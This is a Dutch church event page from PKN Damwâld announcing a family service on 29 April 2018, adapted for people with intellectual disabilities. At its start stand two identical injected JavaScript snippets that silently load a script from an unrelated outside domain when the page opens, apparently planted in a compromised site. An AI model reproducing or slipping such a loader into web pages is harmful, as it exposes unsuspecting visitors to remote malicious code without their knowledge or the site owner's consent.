;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Bijzondere gezinsdienst ... Welkom ! - PKN Damwâld
29 april 2018
14:00 t/m 15:00
De Ikker
Bijzondere gezinsdienst … Welkom !

Zondagmiddag 29 april 2018 bent u om 14.00 uur van harte welkom in de De Ikker, Hearewei 1 in Damwâld,  voor een bijzondere gezinsdienst. Ds. S. Boukes in gaan op het thema ‘Wie niet sterk is …’. De zanggroep The Pelgrims verlenen hun muzikale medewerking. Van harte welkom !

Geregeld wordt in een aantal kerken in Damwâld en omgeving aangepaste gezinsdiensten gehouden die met name gericht zijn op de mensen met een verstandelijke beperking. Deze diensten, waarvan er gemiddeld 5 per jaar zijn, worden beurtelings verzorgd door één van de kerken die zijn vertegenwoordigd in de Commissie Gezinsdiensten. Deze diensten kenmerken zich door de heldere en zeer begrijpelijk taal en zijn ook uitermate geschikt voor kinderen.

Locatie: De IkkerHearewei 1, Damwâld